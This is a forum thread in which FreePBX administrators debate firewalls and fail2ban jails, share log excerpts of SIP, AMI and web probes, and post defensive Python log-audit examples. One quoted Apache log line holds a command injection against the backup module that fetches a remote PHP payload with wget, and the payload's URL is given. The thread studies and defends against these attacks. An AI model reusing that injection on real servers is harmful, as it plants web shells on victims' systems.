A challenge to all FreePBX based Distros

As I said above…
This is not saying it can't be easily installed; we just cannot distribute it, as this would violate their terms and licensing.

Contrary to what others may tell you, people's copyrights and other rights do matter.

Thank you James, exactly! But please actually read their license; there is no mention of copyright anywhere apart from that it remains with the author.

It takes 5 minutes to install, maybe a little longer to actually RTFM :slight_smile:

Any bootable Linux machine without a fully functional firewall immediately in place is as effective as a fish without a lasso to catch those dudes.

I understand you guys have tied your own hands; maybe you then just need to support/endorse an open-source firewall that can be deployed outside your closed system without compromise to your licenses (obviously not endorsing any end-user abuse of such licenses), which would fill the obvious gap in your distro.

You shall not:

	3.1.1	modify, adapt, merge, translate, decompile, 
	disassemble, or reverse engineer the Product, except as 
	permitted by law; or

	3.1.2	sell, assign, rent, sub-license, loan, mortgage, 
	charge or otherwise deal in any way in the Product or 
	Documentation or any interest in them except as expressly 
	provided in this Licence.

The need for a per-machine firewall is subjective.

-#1 If you run a hosted PBX explicitly accepting traffic from 0/0 with all (needed) ports exposed to The 'Net, you need one, no doubt 'bout that. But then you’re probably a weathered admin who knows what you are doing.

-#2 If you run an in-house private VoIP intranet, meaning you have an Internet Gateway with a Firewall already, above the PBX, with rules to allow only to/from the trunk providers' IPs, I'd say it's probably debatable whether you need more than fail2ban on the PBX itself, as your Internet Gateway already does firewalling for you. My Fail2Ban has run like that since deployment; I have not seen an IP from the wild outside banned yet.

-#3 Do you need one if you, say, allow your 'roadrunners' into the private VoIP intranet of case #2 through dedicated tunnel(s)? That is, you already punched a hole through the Gateway Firewall to let traffic into the TUNnel server… Do you need more firewalls? Possibly, but not the same kind as case #1.

-#4 Variations of the kind 'I have a public IPv6/IPv4 VoIP-only (and also not VoIP-exclusive; hey, people have softphones on their PCs) subnet in my house' network are also possible.

So a guidance into each case would probably be welcome, but I can’t see how any ‘standard’ firewall can cater for all of that at the same time.

Well said. Really, if you are using cookie-cutter security you have already lost the war. Here is the thing about "packaging security": the bad guys have the package and know your battle plan. People should be vigilant and manage their security as appropriate for their situation. Some folks should probably hire someone to do this for them. The best route for these things is to give guides, tutorials and how-to's. If you are an expert in a certain subject matter, feel free to write a guide. I don't know if users can, but I know admins can make a post like a wiki so it can be collaborative.

Remember all security measures should be considered YMMV. What works for one may not be ideal for another. Janice’s Bakery and tire shop doesn’t need the same security footprint as the pentagon.

These are the IP addresses (good and possibly bad) that go through your current implementation of iptables, and surely ANY use of iptables counts as a "firewall", even fail2ban.

grep -ohrE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' /var/log/* | grep -vE "^(0\.0\.0\.0|127\.0\.0\.1)$|Binary|$(wget -qO- http://ipecho.net/plain)" | sort -u

There is nothing "cookie cutter" about iptables in general nor CSF specifically. You all have it working; it is up to you to build an effective set of rules. And I'm pretty sure that ALL "security measures" you might care to deploy will ultimately rely on your implementation of iptables.

I am suggesting that it would be good practice to make sure that the issue of the above suggested command ONLY includes your "known hosts" or acceptable use of your mailserver/webserver/provisioning/etc.

My guess is that almost everyone will have something in that issue that would lead her to question security on that machine.

Without doubt the badguys already have the FreePBX “battleplan” and it’s not based on SIP alone :wink:
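As an added example (not code from this thread), here is the same audit the grep pipeline above performs, done in Python against an allowlist of the networks the PBX is expected to talk to, so anything outside that list stands out. The log excerpt mixes two attacker addresses quoted elsewhere in this thread with RFC 5737 addresses standing in for the legitimate trunk, office and mail-relay hosts; the known networks and the box's own public IP (what the wget to ipecho.net returns) are constructed and hard-coded so it runs offline.

```python
import ipaddress
import re

# Constructed stand-in for what the grep over /var/log/* pulls out on a small PBX.
# 190.12.31.42 and 62.210.211.233 are scanners seen in this thread; the rest are
# RFC 5737 documentation addresses playing the legitimate hosts.
SAMPLE_LOG = """\
Jun 10 13:58:44 localhost sshd[7831]: Invalid user ubnt from 190.12.31.42
[2015-06-10 18:48:25] NOTICE[4338] Request from '"2000" <sip:2000@203.0.113.10>' failed for '62.210.211.233:5068'
Jun 10 14:00:01 localhost postfix/smtpd[1201]: connect from relay.example.net[198.51.100.25]
Jun 10 14:00:02 localhost httpd: 127.0.0.1 - - "GET /admin/ HTTP/1.1" 200 -
Jun 10 14:00:03 localhost asterisk[900]: Registered SIP 'trunk' at 192.0.2.15:5060
Jun 10 14:00:04 localhost kernel: eth0: bound to 0.0.0.0
"""

# The ranges this PBX is expected to exchange traffic with (constructed):
# trunk provider, mail relay, office LAN. Anything else in the logs deserves a look.
KNOWN_NETWORKS = ["192.0.2.0/24", "198.51.100.0/24", "10.0.0.0/8"]

# What `wget -qO- http://ipecho.net/plain` returns for this box; hard-coded here.
OWN_PUBLIC_IP = "203.0.113.10"

# Same dotted-quad pattern as the grep -E in the thread, plus word boundaries so
# port numbers and PIDs glued to an address are not swallowed into it.
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4][0-9]|1?[0-9]{1,2})\.){3}"
    r"(?:25[0-5]|2[0-4][0-9]|1?[0-9]{1,2})\b"
)


def extract_ips(text, own_ip):
    """Unique IPv4 addresses in text, minus 0.0.0.0, loopback and the box's own address."""
    found = set()
    for match in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(match)
        except ValueError:          # e.g. an octet with a leading zero; not a real address
            continue
        if ip.is_unspecified or ip.is_loopback or str(ip) == own_ip:
            continue
        found.add(ip)
    return sorted(found)            # numeric order, like `sort -u` would not give you


def classify(ips, known_networks):
    """Split addresses into those inside a known network and those that are not."""
    nets = [ipaddress.ip_network(n) for n in known_networks]
    known, unknown = [], []
    for ip in ips:
        (known if any(ip in n for n in nets) else unknown).append(str(ip))
    return {"known": known, "unknown": unknown}


def audit(text=SAMPLE_LOG, known_networks=KNOWN_NETWORKS, own_ip=OWN_PUBLIC_IP):
    """Run the whole check; 'unknown' is the list the thread says should be empty."""
    return classify(extract_ips(text, own_ip), known_networks)


if __name__ == "__main__":
    result = audit()
    print("known:  ", ", ".join(result["known"]))
    print("unknown:", ", ".join(result["unknown"]))
```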

Yeah, I suppose any FW rule builder ultimately compiles a set of iptables commands anyway?

Computing security rule #1: with computers on the 'net, you never know if you are paranoid enough, or not yet…

Talking of "cookie-cutter" solutions, just for a grin I spun up a brand new copy of FreePBX stable (Asterisk 13) a couple of hours ago. It was on an as yet unused public IP address; I updated using Yum and then rebooted. As of 18:49 PST the fail2ban regexes do not capture pjsip login fails.

[2015-06-10 18:48:25] NOTICE[4338] res_pjsip/pjsip_distributor.c: Request from '"2000" <sip:[email protected]>' failed for '62.210.211.233:5068' (callid: [email protected]) - No matching endpoint found


As you can see, an iptables without connection limiting, port-flooding and port-scanning protection still leaves you exposed.

These are the particular "bad guys":

5.152.222.48/29 # RIPE GB RSDEDI-DJNIPIAM Dedicated Server Hosting
62.210.128.0/17 # RIPE FR IE-POOL-BUSINESS-HOSTING IP Pool for Iliad-Entreprises Business Hosting Customers
107.150.32.0/19 # ARIN US DSV4-8 DataShack, LC
199.19.104.0/21 # ARIN US VOLUMEDRIVE VolumeDrive

The same old guys . . . in only a couple of hours.

Interesting.
As you respun the system from scratch, I know it /might/ not be practical, but maybe some Wireshark-like solution would tell you whether the box is trying to send (or in fact sending) packets to IPs not associated with the FreePBX project? The destination addresses may NOT actually be the ones you've listed, i.e. maybe it's just letting some 'listeners' know of its address, and then the ones you've listed are getting the hang of it and start flooding/querying?

(To expand a bit on that : long time ago there was /a/ program (maybe PINE, but not sure now) that, upon first start, asked for permission to send a SINGLE UDP PACKET to a pre-programmed destination (of course, shown to user), for statistical purposes… This was only done when user agreed though. Times have changed, methods of programming / gathering feedback have evolved… but techniques might have not exactly ?.. Just stabbing in the dark, hope this makes sense)

Not necessary; that is expected traffic to udp:5060 if you do not have a functional firewall. The same will be noticed on a forward-facing open tcp:5038, as this instance has it:

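Added example, not code from this thread or from fail2ban itself: the matching and maxretry/findtime logic fail2ban applies, written out in Python for the two kinds of Asterisk NOTICE lines this thread shows, the pjsip "No matching endpoint found" line that the shipped filter missed and the AMI authentication failures on tcp:5038. The sample lines use RFC 5737 addresses (constructed, not the hosts quoted above) and the thresholds of 5 retries in 600 seconds are assumed fail2ban-style defaults; the run shows that a probe pacing itself at one username every ~76 minutes, like the AMI one here, never trips a 600-second findtime.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# fail2ban-style failregex patterns. <HOST> is expanded to a capture group the way
# fail2ban does it. Pattern 1 is the pjsip distributor line; 2 and 3 are AMI failures.
FAILREGEXES = [
    r"res_pjsip/pjsip_distributor\.c: Request from '.*' failed for '<HOST>:\d+' "
    r"\(callid: .*\) - No matching endpoint found$",
    r"NOTICE\[\d+\] <HOST> failed to authenticate as '.*'$",
    r"NOTICE\[\d+\] <HOST> tried to authenticate with nonexistent user '.*'$",
]
HOST = r"(?P<host>(?:\d{1,3}\.){3}\d{1,3})"
COMPILED = [re.compile(p.replace("<HOST>", HOST)) for p in FAILREGEXES]

# Asterisk's "[YYYY-MM-DD HH:MM:SS]" prefix, with the optional "filename:" grep -r prints.
TIMESTAMP = re.compile(r"^(?:[^\s\[]+:)?\[(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\]")

# Constructed sample shaped like the thread's evidence: a six-request pjsip burst inside
# two seconds from one host, and an AMI probe trying one username about every 76 minutes.
PJSIP_LINE = (
    "[2015-06-10 18:48:%02d] NOTICE[4338] res_pjsip/pjsip_distributor.c: Request from "
    "'\"2000\" <sip:2000@203.0.113.10>' failed for '198.51.100.45:5068' "
    "(callid: a1b2@198.51.100.45) - No matching endpoint found"
)
SAMPLE_LOG = [PJSIP_LINE % 24] + [PJSIP_LINE % 25 for _ in range(5)] + [
    "/var/log/asterisk/full:[2015-06-11 04:13:00] NOTICE[19995] 192.0.2.29 tried to authenticate with nonexistent user 'test'",
    "/var/log/asterisk/full:[2015-06-11 04:13:00] NOTICE[19995] 192.0.2.29 failed to authenticate as 'test'",
    "/var/log/asterisk/full:[2015-06-11 05:29:29] NOTICE[22065] 192.0.2.29 tried to authenticate with nonexistent user 'panel'",
    "/var/log/asterisk/full:[2015-06-11 05:29:29] NOTICE[22065] 192.0.2.29 failed to authenticate as 'panel'",
    "/var/log/asterisk/full:[2015-06-11 06:45:58] NOTICE[24085] 192.0.2.29 tried to authenticate with nonexistent user 'munin'",
    "/var/log/asterisk/full:[2015-06-11 06:45:58] NOTICE[24085] 192.0.2.29 failed to authenticate as 'munin'",
    # a benign line with a timestamp that must not count as a failure
    "[2015-06-10 18:48:30] VERBOSE[4338] res_pjsip/pjsip_configuration.c: Endpoint 2000 is now Reachable",
]


def parse_failures(lines):
    """Return [(datetime, host)] for every line that matches one of the failregexes."""
    failures = []
    for line in lines:
        ts = TIMESTAMP.match(line)
        if not ts:
            continue
        for rx in COMPILED:
            m = rx.search(line)
            if m:
                when = datetime.strptime(ts.group(1), "%Y-%m-%d %H:%M:%S")
                failures.append((when, m.group("host")))
                break
    return failures


def decide_bans(failures, maxretry=5, findtime=600):
    """Sliding-window count per host: ban once maxretry failures fall inside findtime
    seconds. Returns {host: time of the failure that triggered the ban}."""
    window = timedelta(seconds=findtime)
    recent = defaultdict(list)
    bans = {}
    for when, host in sorted(failures):
        if host in bans:
            continue
        recent[host] = [t for t in recent[host] if when - t <= window] + [when]
        if len(recent[host]) >= maxretry:
            bans[host] = when
    return bans


if __name__ == "__main__":
    fails = parse_failures(SAMPLE_LOG)
    print("defaults:      ", decide_bans(fails))
    print("findtime=1day: ", decide_bans(fails, findtime=86400))
```

With the defaults only the pjsip burst host is banned; stretching findtime to a day also catches the slow AMI prober, which is the trade-off behind the "long bantime" advice later in this thread.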

I don’t mean to be a pain, but did you create a ticket about that? I was just randomly browsing through the forum, and I see a critical security issue, and no ticket?

No, @xrobau, I didn't; you already have an unresolved

http://issues.freepbx.org/browse/FREEPBX-9222

I started this thread hopefully to start a conversation about firewalls/adequate iptables rules for FreePBX per se , not to criticize any particular distro or implementation. I personally don’t use the distro.

I prefer gitting fail2ban from the horse's mouth.

https://github.com/fail2ban/fail2ban/tarball/master

(May 25 2015)

And their asterisk jail catches that log line.

It has a lot more jails and is faster with pynotify and all :wink: and again, only IMHO, it has lots of very pertinent jails like postfix, apache-nohome, apache-noscript, apache-modsecurity and webmin, which are more appropriate for my systems.


I love tickets! Let me go and hug it and squeeze it and call it George.

Edit: I've updated that ticket with the mention that there are unpackaged commits. I'll see if we can pull them into a custom build.


For those who are following . .

Same machine /var/log/httpd/error.log now has


These can be effectively eliminated with apache-noscript and apache-nohome jails.

Simply changing the ssh port from 22 will stop


At least fail2ban catches those in general.

Hopefully you are seeing that adding prophylactic measures can only improve your current "security theater".

I meant rather,

To be plain & simple: while doing the config & stuff, before having trunks configured etc., the machine is NOT expected to receive any incoming SIP login requests, right?
In fact it is probably not expected to send any kind of requests to the 'net, to servers other than FreePBX owns (mirrors etc.) right?

But this is why it's relevant to know WHEN these login attempts actually start happening, in relation to the box setup and config process. Or so I think :wink:

In other words: I find it very hard to believe that, having e.g. installed and configured a system/distro from scratch, FreePBX or otherwise, and 'just' by starting Asterisk to >listen< to SIP traffic and talk to a SIP trunk, this kind of auth failure would just start 'out of the blue'. Either something affiliated with the 'invaders' scans the 'Internet' for open port 5060 and then passes its findings to the invaders, or something from inside the newly configured system calls home (it may even be a minute, harmless, totally unrelated 'thing', maybe just something hosted by the same company that owns the 'invaders' servers? NTP? Ajax? PHP? Just to name what comes to my head…)

I know it may sound like a crazy fairy tale :wink: but if /I/ can imagine this, how can I know anyone hasn’t imagined this before :slight_smile:

And of course I might also be completely wrong :wink:

No, as soon as chan_sip/chan_pjsip is loaded by Asterisk, traffic on 5060/5061 will become apparent; this machine has no configuration beyond a login account on the GUI.

It is not a matter of IF that traffic will appear, it’s just a matter of WHEN.

FWIW after a couple of days


Notice the developing pattern of clustered attackers; this is not coincidental.

Here is a demonstration of an attack from

host 5.196.91.180 in network 5.196.0.0/16       # RIPE    FR FR-OVH-20120823                          OVH SAS


[root@localhost ~]# cat /var/log/httpd/error_log |grep 5.196.91.180
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/saky.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/k4ijo.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/alex.php' not found or unable to stat
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] script '/var/www/html/recordings/misc/index.php' not found or unable to stat, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] script '/var/www/html/recordings/misc/index.php' not found or unable to stat
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/ama.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/Do_Me.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/ama.php

You will see that over days he is probing for known vulnerabilities (the old hands will perhaps recognize the vulnerabilities), then a couple of days later he tries to inject, unsuccessfully

http://1337s.cc/index.php

The interesting correlation is

cat /var/log/httpd/error_log |grep MAYET
[Fri Jun 12 11:00:46 2015] [error] [client 81.10.94.241] File does not exist: /var/www/html/favicon.ico, referer: http://162.42.215.183/admin/modules/backup/page.backup.php?action=deletedataset&dir=%27;wget%20http://184.107.105.35/classes/ELMAYET_ELMAYET.txt%20%20-O%20zz.php;%20echo%20%27mission%20done
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php

One directed Google search for MAYET would find a guy in South Africa who is an expert in VoIP and security (I’m sure his work was stolen), but if you read the script

http://184.107.105.35/classes/ELMAYET_ELMAYET.txt

(zz.php), it would really be quite devastating if it got onto your machine; here the apache-nohome jail would have caught him on Thu Jun 11 16:30:26 2015. You should reasonably use a long bantime to mitigate the threat.

Yes, this was a failed attempt, but as you see the risk is real, and on this machine a related but more robust attack would needlessly expose the server to penetration.

Food for thought maybe? Or should we just sweep it under the rug :wink:
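To make the point about the apache-nohome jail concrete, here is an added example (not from the post or from fail2ban itself) that applies fail2ban-style maxretry/findtime counting to Apache error_log lines of the shape quoted above. The log lines, the client addresses and the thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache 2.2-style error_log line: "[date] [error] [client IP] message".
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[\d.]+)\] (?P<msg>.*)$")
# Messages that mean a request for a file that does not exist or is forbidden.
PROBE_RE = re.compile(r"^(script '.*' not found or unable to stat|"
                      r"client denied by server configuration: |File does not exist: )")

def parse(line):
    """Return (timestamp, client_ip, message), or None for lines of another shape."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"), m["ip"], m["msg"]

def find_offenders(lines, maxretry=5, findtime=timedelta(minutes=10)):
    """fail2ban-style counting: {ip: time of the maxretry-th probe seen within findtime}."""
    hits = defaultdict(list)
    banned = {}
    for line in lines:
        parsed = parse(line)
        if parsed is None or not PROBE_RE.match(parsed[2]):
            continue
        ts, ip, _ = parsed
        if ip in banned:
            continue  # already flagged; a real jail would be dropping its packets by now
        hits[ip] = [t for t in hits[ip] if ts - t <= findtime] + [ts]  # slide the window
        if len(hits[ip]) >= maxretry:
            banned[ip] = ts
    return banned

# Constructed sample in the same shape as the excerpt above (RFC 5737 test addresses).
SAMPLE_LOG = [
    "[Sat Jun 13 14:14:52 2015] [error] [client 203.0.113.45] client denied by server configuration: /var/www/html/recordings/misc/probe.php",
    "[Sat Jun 13 14:14:52 2015] [error] [client 203.0.113.45] client denied by server configuration: /var/www/html/recordings/misc/probe.php, referer: http://example.invalid/index.php",
    "[Sat Jun 13 14:14:53 2015] [error] [client 203.0.113.45] script '/var/www/html/recordings/misc/index.php' not found or unable to stat",
    "[Sat Jun 13 14:14:54 2015] [error] [client 203.0.113.45] client denied by server configuration: /var/www/html/recordings/ama.php",
    "[Sat Jun 13 14:14:55 2015] [error] [client 198.51.100.7] PHP Notice:  Undefined index: foo in /var/www/html/admin/config.php on line 12",
    "[Sat Jun 13 14:14:56 2015] [error] [client 203.0.113.45] File does not exist: /var/www/html/favicon.ico",
]

def demo():
    return find_offenders(SAMPLE_LOG)

if __name__ == "__main__":
    for ip, when in demo().items():
        print(f"would ban {ip} at {when:%a %b %d %H:%M:%S %Y}")
```

With maxretry=5 the constructed client is flagged on its fifth probe; the PHP notice from the other client is ignored because it is not a probe pattern.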

(to this and the next message)
Interesting, indeed.

Can we treat this in stages, probably?

  • prerequisite: set up Wireshark or something like that on a separate machine (or a separate VM, maybe even better), adjacent to the one you’re looking at, to intercept / look at the packet flow incoming to the one where you’ll be installing FreePBX.
  • at the very least record packet source and destination (and src/dst ports) in timely correlation with:
  • distro setup (take note of FreePBX servers/mirrors accessed)
    (system set up, first ever GUI / dashboard access/login)
  • system up, NOT running Asterisk
  • system up, running Asterisk but no chan_sip/chan_pjsip / not listening on port 5060
  • system up, running Asterisk with the channel module as described above (no configuration but a login account on the GUI)
  • (what the above is supposed to track/find is: are there any hosts on the 'net other than FreePBX Project/Sangoma/Digium etc. that your test machine is sending ANY sort of packets TO at ANY point? Even the smallest ones.)

Like I said, I find it quite unbelievable that a newly set up system would ‘just’ get itself under potential brute-forcing or DDoS attack ‘just like that’ without something ‘from inside’ of it letting the invaders know it’s there. Note that ‘something inside’ may also be completely unrelated to Asterisk.

Hope this helps & that it’s not crazy talk :wink:
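As an added example (not part of the post above), this is one way to evaluate the staged captures the post proposes: feed the `tcpdump -nn` text from each stage in order and list the destinations the PBX itself first contacts at that stage, outside the networks you expect (own LAN, the mirrors noted during setup). The PBX address, the expected networks and the capture lines are all constructed placeholders, including the stage-three hit, which only shows what a finding would look like.

```python
import re
from ipaddress import ip_address, ip_network

# One `tcpdump -nn` text line (IPv4 only): "HH:MM:SS.us IP src.sport > dst.dport: ...".
PKT_RE = re.compile(r"^\S+ IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+):")

PBX_HOST = "192.168.1.10"           # assumed address of the box under test
EXPECTED = [ip_network(n) for n in (
    "192.168.1.0/24",               # own LAN: gateway, DNS, the capture box
    "203.0.113.0/24",               # placeholder for the distro mirrors noted during setup
)]

def outbound_destinations(capture_lines, pbx_host=PBX_HOST, expected=EXPECTED):
    """(dst_ip, dst_port) pairs the PBX itself sent packets to, outside the expected networks."""
    seen = set()
    for line in capture_lines:
        m = PKT_RE.match(line)
        if m is None or m["src"] != pbx_host:
            continue                  # inbound scans and non-IP lines are not the question here
        if any(ip_address(m["dst"]) in net for net in expected):
            continue
        seen.add((m["dst"], int(m["dport"])))
    return seen

def new_per_stage(stages):
    """For an ordered list of (stage_name, lines), report destinations first seen at each stage."""
    known, result = set(), {}
    for name, lines in stages:
        fresh = outbound_destinations(lines) - known
        result[name] = sorted(fresh)
        known |= fresh
    return result

# Constructed capture excerpts (RFC 5737 test addresses), one per stage of the list above.
STAGES = [
    ("distro setup", [
        "10:01:02.000001 IP 192.168.1.10.40001 > 192.168.1.1.53: 1234+ A? mirror.example.invalid. (40)",
        "10:01:02.100000 IP 192.168.1.10.40002 > 203.0.113.20.80: Flags [S], seq 1, win 29200, length 0",
        "10:01:03.000000 IP 198.51.100.9.5060 > 192.168.1.10.5060: SIP: OPTIONS sip:100@192.168.1.10 SIP/2.0",
    ]),
    ("system up, not running asterisk", [
        "10:20:00.000000 IP 192.168.1.10.40010 > 203.0.113.20.443: Flags [S], seq 1, win 29200, length 0",
    ]),
    ("system up, asterisk with channel module", [
        "10:40:00.000000 IP 192.168.1.10.5060 > 198.51.100.77.5060: SIP: REGISTER sip:198.51.100.77 SIP/2.0",
    ]),
]

def demo():
    return new_per_stage(STAGES)
```

The inbound OPTIONS scan in stage one is deliberately ignored: the post's question is what the box sends out, not what arrives.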

You could do all that crazy stuff but the result would not reveal anything nefarious.
Any unsolicited connection on any port that your server has open will be serviced. This includes tcp 5038, 22, 80, 8088 and the one that iSymphony uses, also udp 53, 69, 123, 4569, 5060 and 5061 on this machine.

Whether you find it believable or not, connections WILL eventually arrive on those ports. At this point in time this machine has only filtered ssh tcp/22 successfully 80 times for 2 hosts out of 14000+ total connections from 227 different hosts, a vast majority of which were to udp/5060 but a significant minority to http “files” and “scripts” that don’t exist.